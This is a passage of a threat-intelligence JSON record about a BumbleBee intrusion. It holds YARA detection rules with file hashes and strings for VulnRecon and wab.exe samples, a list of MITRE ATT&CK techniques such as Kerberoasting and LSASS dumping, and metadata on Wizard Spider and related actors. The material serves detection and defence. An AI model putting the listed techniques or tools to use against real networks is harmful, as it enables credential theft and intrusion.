13387\r\nReference: https://thedfirreport.com\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nrule bumblebee_13387_VulnRecon_dll {\r\n meta:\r\n description = \"BumbleBee - file VulnRecon.dll\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com\"\n date = \"2022-08-08\"\n hash1 = \"a9e90587c54e68761be468181e56a5ba88bac10968ff7d8c0a1c01537158fbe8\"\n strings:\n $x1 = \"Use VulnRecon.exe -i, --SystemInfo to execute this command\" fullword wide\n $x2 = \"Use VulnRecon.exe -v, --Vulnerability to execute this command\" fullword wide\n $x3 = \"Use VulnRecon.exe -h, --HotFixes to execute this command\" fullword wide\n $x4 = \"Use VulnRecon.exe -m, --MicrosoftUpdates to execute this command\" fullword wide\n $x5 = \"Use VulnRecon.exe 
-s, --SupportedCve to execute this command\" fullword wide\n $s6 = \"VulnRecon.dll\" fullword wide\n $s7 = \"VulnRecon.Commands.SystemCommands\" fullword ascii\n $s8 = \"VulnRecon.Commands.CveCommands\" fullword ascii\n $s9 = \"VulnRecon.Commands\" fullword ascii\n $s10 = \"VulnRecon.CommandLine\" fullword ascii\n $s11 = \"D:\\\\work\\\\rt\\\\VulnRecon\\\\VulnRecon\\\\obj\\\\Release\\\\net5.0\\\\VulnRecon.pdb\" fullword ascii\n $s12 = \"VulnRecon.Commands.ToolsCommand\" fullword ascii\n $s13 = \"Using VulnRecon.exe -o or VulnRecon.exe --OptionName\" fullword wide\n $s14 = \"commandVersion\" fullword ascii\n $s15 = \"GetSystemInfoCommand\" fullword ascii\n $s16 = \"CreateGetSupportedCveCommand\" fullword ascii\n $s17 = \"CreateWindowsVersionCommand\" fullword ascii\n $s18 = \" \" fullword ascii\n $s19 = \"get_CommandVersion\" fullword ascii\n $s20 = \"k__BackingField\" fullword ascii\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 50KB and\n 1 of ($x*) and 4 of them\n}\nrule bumblebee_13387_VulnRecon_exe {\n meta:\n description = \"BumbleBee - file VulnRecon.exe\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com\"\n date = \"2022-08-08\"\n hash1 = \"eb4cba90938df28f6d8524be639ed7bd572217f550ef753b2f2d39271faddaef\"\n strings:\n $s1 = \"hostfxr.dll\" fullword wide\n $s2 = \"--- Invoked %s [version: %s, commit hash: %s] main = {\" fullword wide\n $s3 = \"This executable is not bound to a managed DLL to execute. 
The binding value is: '%s'\" fullword wi\n $s4 = \"D:\\\\a\\\\_work\\\\1\\\\s\\\\artifacts\\\\obj\\\\win-x64.Release\\\\corehost\\\\cli\\\\apphost\\\\standalone\\\\Release\\\n $s5 = \"VulnRecon.dll\" fullword wide\n $s6 = \"api-ms-win-crt-runtime-l1-1-0.dll\" fullword ascii\n $s7 = \" - %s\u0026apphost_version=%s\" fullword wide\n $s8 = \"api-ms-win-crt-convert-l1-1-0.dll\" fullword ascii\n $s9 = \"api-ms-win-crt-math-l1-1-0.dll\" fullword ascii\n $s10 = \"api-ms-win-crt-time-l1-1-0.dll\" fullword ascii\n $s11 = \"api-ms-win-crt-stdio-l1-1-0.dll\" fullword ascii\n $s12 = \"api-ms-win-crt-heap-l1-1-0.dll\" fullword ascii\n $s13 = \"api-ms-win-crt-string-l1-1-0.dll\" fullword ascii\n $s14 = \"The managed DLL bound to this executable is: '%s'\" fullword wide\n $s15 = \"A fatal error was encountered. This executable was not bound to load a managed DLL.\" fullword wi\n $s16 = \"api-ms-win-crt-locale-l1-1-0.dll\" fullword ascii\n $s17 = \"Showing error dialog for application: '%s' - error code: 0x%x - url: '%s'\" fullword wide\n $s18 = \"Failed to resolve full path of the current executable [%s]\" fullword wide\n $s19 = \"https://go.microsoft.com/fwlink/?linkid=798306\" fullword wide\n $s20 = \"The managed DLL bound to this executable could not be retrieved from the executable image.\" full\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 400KB and\n all of them\n}\nrule bumblebee_13387_wab {\n meta:\n description = \"BumbleBee - file wab.exe\"\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com\"\r\n date = \"2022-08-08\"\r\n hash1 = \"1cf28902be615c721596a249ca85f479984ad85dc4b19a7ba96147e307e06381\"\r\n strings:\r\n $s1 = \"possibility terminate nation inch ducked ski accidentally usage absent reader rowing looking smac\r\n $s2 = \"pfxvex450gd81.exe\" fullword ascii\r\n $s3 = \"31403272414143\" ascii /* hex encoded string '1@2rAAC' */\r\n $s4 = 
\"s wolf save detail surgery short vigour uttered fake proposal moustache accustomed lock been vege\r\n $s5 = \"130 Dial password %d propose7177! Syllable( warrior stretching Angry 83) sabotage %s\" fullword wi\r\n $s6 = \"possibility terminate nation inch ducked ski accidentally usage absent reader rowing looking smac\r\n $s7 = \"accomplish course Content 506) arched organ Travels\" fullword ascii\r\n $s8 = \"123 serve edit. 693 Poison@ mercy \" fullword wide\r\n $s9 = \"Top wealthy! fish 760? pier%complaint July nicer! 587) %s shark+ \" fullword wide\r\n $s10 = \" Approximate- Choked- %s %s, \" fullword wide\r\n $s11 = \"niece beacon dwelling- Headlong Intellectual+\" fullword ascii\r\n $s12 = \"\u003eCertainty holes) cherries Proceeding Active+ surname Rex/ gets\" fullword wide\r\n $s13 = \"+Enthusiastic@ Couple? %s, shy %d %d) plume \" fullword wide\r\n $s14 = \" again workroom front leader height mantle mother sudden illness discontent who finest southern\r\n $s15 = \"Advantage %s+ Creation. officially/ Affirmative %s? %s \" fullword ascii\r\n $s16 = \"Mind@ falcon+ illumination repair/ %s! \" fullword ascii\r\n $s17 = \"%Truthful- %d/ 161! Checking 786/ Mob \" fullword wide\r\n $s18 = \"#%s. %s Door observed- lazy? Quiet@ \" fullword wide\r\n $s19 = \"wrong comer? %s) Designer$ 372\" fullword wide\r\n $s20 = \"Fleet( %d, lads. %d! 
%d %s 445\" fullword wide\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 200KB and\r\n 8 of them\r\n}\r\nMITRE\r\nPhishing – T1566\r\nMalicious File – T1204.002\r\nWindows Command Shell – T1059.003\r\nPowerShell – T1059.001\r\nProcess Injection – T1055\r\nFile Deletion – T1070.004\r\nLSASS Memory – T1003.001\r\nKerberoasting – T1558.003\r\nDomain Account – T1087.002\r\nDomain Trust Discovery – T1482\r\nLateral Tool Transfer – T1570\r\nRemote Desktop Protocol – T1021.001\r\nValid Accounts – T1078\r\nRemote Access Software – T1219\r\nIngress Tool Transfer – T1105\r\nWeb Protocols – T1071.001\r\nSystem Services – T1569\r\nSMB/Windows Admin Shares – T1021.002\r\nSoftware Discovery – T1518\r\nSystem Network Configuration Discovery – T1016\r\nRemote System Discovery – T1018\r\nProcess Discovery – T1057\r\nMark-of-the-Web Bypass – T1553.005\r\nMasquerading – T1036\r\nRundll32 – T1218.011\r\nDomain Groups – T1069.002\r\nWindows Management Instrumentation – T1047\r\nPassword Guessing – T1110.001\r\nInternal case #13387\r\nSource: https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/"
	],
	"report_names": [
		"bumblebee-roasts-its-way-to-domain-admin"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4594f985-865e-4862-8047-2e80226e246a",
			"created_at": "2022-10-27T08:27:12.984825Z",
			"updated_at": "2026-04-10T02:00:05.293575Z",
			"deleted_at": null,
			"main_name": "EXOTIC LILY",
			"aliases": [
				"EXOTIC LILY"
			],
			"source_name": "MITRE:EXOTIC LILY",
			"tools": [
				"Bazar"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "56384d06-abc2-4853-8440-db4d7b7d1b5f",
			"created_at": "2023-01-06T13:46:39.367122Z",
			"updated_at": "2026-04-10T02:00:03.303733Z",
			"deleted_at": null,
			"main_name": "EXOTIC LILY",
			"aliases": [
				"DEV-0413"
			],
			"source_name": "MISPGALAXY:EXOTIC LILY",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a2d3f35f-3b29-4509-bff5-af2638140d39",
			"created_at": "2022-10-25T16:07:23.633982Z",
			"updated_at": "2026-04-10T02:00:04.695802Z",
			"deleted_at": null,
			"main_name": "FIN12",
			"aliases": [],
			"source_name": "ETDA:FIN12",
			"tools": [
				"Agentemis",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"KEGTAP",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434357,
	"ts_updated_at": 1775826788,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c2b59de92052209cbcb40bbe53c4c82efb43ed02.pdf",
		"text": "https://archive.orkl.eu/c2b59de92052209cbcb40bbe53c4c82efb43ed02.txt",
		"img": "https://archive.orkl.eu/c2b59de92052209cbcb40bbe53c4c82efb43ed02.jpg"
	}
}